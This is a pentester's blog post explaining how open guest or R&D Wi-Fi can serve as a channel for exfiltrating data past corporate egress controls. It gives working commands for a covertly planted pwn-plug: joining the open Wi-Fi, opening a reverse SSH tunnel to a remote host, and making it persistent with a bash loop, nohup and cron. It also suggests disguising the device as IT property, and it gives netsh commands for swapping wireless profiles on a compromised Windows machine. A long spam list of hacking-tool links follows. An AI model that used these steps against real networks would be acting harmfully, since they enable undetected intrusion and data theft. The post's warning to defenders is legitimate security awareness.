Monday, August 24, 2020

Backchannel Data Exfiltration Via Guest/R&D Wi-Fi


Often times I find unprotected wireless access points with unfettered access to the internet for research or guest access purposes. This is generally through an unauthenticated portal or a direct cable connection. When questioning the business units they explain a low value network, which is simply a internet pass thru separate from the internal network. This sounds reasonable and almost plausible however I usually explain the dangers of having company assets on an unprotected Wi-Fi and the dangers of client side exploits and MITM attacks. But there are a few other plausible scenarios one should be aware of that may scare you a bit more then the former discussion.

What about using OpenWifi as a backchannel data exfiltration medium?

An open Wi-Fi is a perfect data exfiltration medium for attackers to completely bypass egress filtering issues, DLP, proxy filtering issues and a whole bunch of other protection mechanisms in place to keep attackers from sending out shells and moving data between networks. This can easily be accomplished via dual homing your attack host utilizing multiple nic cards which are standard on almost all modern machines. Whether this is from physical access breach or via remote compromise the results can be deadly. Below are a few scenarios, which can lead to undetectable data exfiltration.




Scenario 1: (PwnPlug/Linux host with Wi-Fi adaptor)
The first useful scenario is when a physical perimeter has been breached and a small device from http://pwnieexpress.com/ known as a pwn-plug is installed into the target network or a linux host with a wireless card. I usually install pwn-plug's inside a closet or under a desk somewhere which is not visible and allows a network connection out to an attacker owned host. Typically its a good idea to label the small device as "IT property and Do Not Remove". This will keep a casual user from removing the device. However if there is network egress and proxy filtering present then our network connection may never reach a remote host. At this point your physical breach to gain network access to an impenetrable network perimeter will fail. Unless there happens to be an open cable Wi-Fi connection to an "inconsequential R&D network".

By simply attaching an Alpha card to the pwnplug you can connect to the R&D wireless network. You can then use this network as your outgoing connection and avoid corporate restrictions regarding outbound connections via metasploit or ssh. I have noticed that most clients these days are running heavy egress filtering and packet level protocol detection, which stops outbound connections. Rather then play the obfuscation game i prefer to bypass the restrictions all together using networks which have escaped corporate policy.

You can automate the following via a script if you wardrive the facility prior to entrance and gain insight into the open wireless network, or you can also configure the plug via serial connection on site provided you have time.

Connect to wifi:
ifconfig wlan0 up
iwconfig wlan0 essid [targetNetworkSSID]
dhclient wlan0

Run a reverse SSH tunnel:
ssh -R 3000:127.0.0.1:22 root@remoteHost.com

On the remote host you can retrieve your shell:
ssh -p 3000 User@localhost

Once you have authenticated with the pwnplug via your local host port forward you now have access into the internal network via an encrypted tunnel which will not be detected and fully bypass any corporate security restrictions. You can take this a bit further and setup some persistence in case the shell goes down.. This can be done via bash and nohup if you setup some ssh keys to handle authentication.. One example could be the following script:

Your bash script: 
#---------------------
#!/bin/bash
while true
do
 ssh -R 3000:127.0.0.1:22 root@remoteHost.com
 sleep 10
done
#---------------------

Run this with nohup like this:
nohup ./shell.sh &


Another simple way would be to setup a cron job to run a script with your ssh command on a specified interval for example every 5 minutes like so:

Cron job for every 5 minutes: 
*/5 * * * * /shell.sh



Scenario 2: (Remote Windows Compromise)
The second scenario is that of a compromised modern windows machine with a wireless card, this can be used to make a wireless connection outbound similar to the first scenario which will bypass restrictions by accessing an unrestricted network. As shown in "Vista Power Tools" paper written by Josh Wright you can use modern windows machines cards via the command line.
http://www.inguardians.com/pubs/Vista_Wireless_Power_Tools-Wright.pdf

Below are the commands to profile the networks and export a current profile then import a new profile for your target wireless network. Then from there you can connect and use that network to bypass corp restrictions provided that wireless network doesn't have its own restrictions.

Profile Victim machine and extract a wireless profile: 
netsh wlan show interfaces
netsh wlan show networks mode=bssid
netsh wlan show profiles
netsh wlan export profile name="CorpNetwork"

Then modify that profile to meet the requirements needed for the R&D network and import it into the victim machine.

Upload a new profile and connect to the network: 
netsh wlan add profile filename="R&D.xml"
netsh wlan show profiles
netsh wlan connect name="R&D"

If you check out Josh's excellent paper linked above you will also find ways of bridging between ethernet and wireless adaptors along with lots of other ideas and useful information.

I just got thinking the other day of ways to abuse so called guest or R&D networks and started writing down a few ideas based on scenarios which play out time and time again while penetration testing networks and running physical breach attacks. I hear all to often that a cable connection not linked to the corporate network is totally safe and I call bullshit on that.

Related posts

  1. Pentest Tools Bluekeep
  2. Hacker Tool Kit
  3. Hacker
  4. Hacking Tools For Games
  5. Hack Tools For Windows
  6. Pentest Tools Subdomain
  7. Hack Tools For Games
  8. Pentest Tools Review
  9. Hacking Tools For Windows 7
  10. Pentest Reporting Tools
  11. Hack Tools Mac
  12. Hackrf Tools
  13. Hacker Tools
  14. Hacking Tools 2020
  15. Ethical Hacker Tools
  16. New Hacker Tools
  17. Hacker Tools For Ios
  18. Game Hacking
  19. Best Hacking Tools 2019
  20. Hacking Tools For Windows Free Download
  21. Pentest Tools Find Subdomains
  22. Pentest Box Tools Download
  23. Pentest Tools Free
  24. Pentest Tools Review
  25. Hack Website Online Tool
  26. Pentest Tools For Android
  27. What Is Hacking Tools
  28. Pentest Tools Framework
  29. Pentest Tools
  30. Hacking Tools For Beginners
  31. Best Hacking Tools 2019
  32. Hacking Tools Pc
  33. Best Hacking Tools 2020
  34. Pentest Tools For Mac
  35. Hack Tools Github
  36. Nsa Hack Tools
  37. Hacker Tools Free Download
  38. Nsa Hacker Tools
  39. Hacker Tools 2020
  40. Hacking Tools Windows 10
  41. New Hack Tools
  42. Hack Rom Tools
  43. Nsa Hack Tools Download
  44. Hacker Tools Free
  45. Github Hacking Tools
  46. What Are Hacking Tools
  47. Tools Used For Hacking
  48. Hack Tools Mac
  49. Hacking Tools Kit
  50. Hacker Tools 2019
  51. Bluetooth Hacking Tools Kali
  52. Pentest Tools For Ubuntu
  53. Hacker Tools Software
  54. Hack Tools For Ubuntu
  55. Bluetooth Hacking Tools Kali
  56. Hacker Security Tools
  57. Pentest Tools List
  58. Hacking Tools Free Download
  59. How To Make Hacking Tools
  60. Pentest Tools Alternative
  61. Hack Rom Tools
  62. Hacker Tools 2019
  63. Pentest Tools Subdomain
  64. Hacker Tool Kit
  65. Pentest Tools Nmap
  66. Easy Hack Tools
  67. Pentest Tools Bluekeep
  68. Growth Hacker Tools
  69. Pentest Tools Url Fuzzer
  70. Hacking Tools For Windows 7
  71. Hacker Tools Linux
  72. Hacker Security Tools
  73. Pentest Tools Subdomain
  74. Hacking Tools For Windows
  75. Pentest Tools For Windows
  76. Easy Hack Tools
  77. Tools Used For Hacking
  78. Hacking Tools For Pc
  79. Hack Tools
  80. Nsa Hacker Tools
  81. Pentest Tools Windows
  82. Hacking Tools
  83. Pentest Tools Linux
  84. Hacking Tools Github
  85. What Are Hacking Tools
  86. Hack Tools For Pc
  87. Hacker Tools 2020
  88. Hack Tools For Games
  89. Hacking Tools 2020
  90. Hacks And Tools
  91. Hack Tools For Games
  92. Pentest Tools Kali Linux
  93. Nsa Hack Tools
  94. Pentest Tools Port Scanner
  95. Hak5 Tools
  96. Wifi Hacker Tools For Windows
  97. Hack Tools Mac
  98. Hack Tools Pc
  99. New Hacker Tools
  100. Best Hacking Tools 2019
  101. Hacking Tools Name
  102. Hacking Tools Free Download
  103. Tools Used For Hacking
  104. Hacking Tools Github
  105. New Hacker Tools
  106. Black Hat Hacker Tools
  107. Pentest Tools Website Vulnerability
  108. Pentest Tools Review
  109. Hacking Apps
  110. Pentest Tools Free
  111. Hacker Tools 2019
  112. Free Pentest Tools For Windows
  113. Hacking Tools For Mac
  114. Hack Tools Pc
  115. Hack Tools
  116. Hacking Tools Pc
  117. Hackers Toolbox
  118. Pentest Box Tools Download
  119. Hacking Tools For Beginners
  120. Hack Apps
  121. Hacker Tools Linux
  122. Pentest Tools Port Scanner
  123. Hacker Tools For Pc
  124. Hacker Security Tools
  125. Kik Hack Tools
  126. Hacker Tools Apk
  127. Hacking Tools For Games
  128. Hacking Tools For Games
  129. Hack And Tools
  130. Pentest Tools Url Fuzzer
  131. Hacker Tools Linux
  132. Hack Tools Mac
  133. Pentest Tools Open Source
  134. Hacking Tools Windows
  135. Hack Tools Online
  136. Pentest Tools Download
  137. Hacker
  138. Hacker Tools Apk
  139. Best Hacking Tools 2020
  140. Pentest Tools Website Vulnerability
  141. Hacking Tools Windows
  142. Hacker Tool Kit
  143. Hacker Tools Free Download
  144. Best Pentesting Tools 2018
  145. Pentest Tools For Ubuntu
  146. Hacker Tools For Pc
  147. Hacking Tools For Windows Free Download
  148. Hacking Tools Windows
  149. Pentest Tools For Android
  150. Hackers Toolbox
  151. Hack Tools For Pc
  152. Hackrf Tools
  153. Hack Tools 2019
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)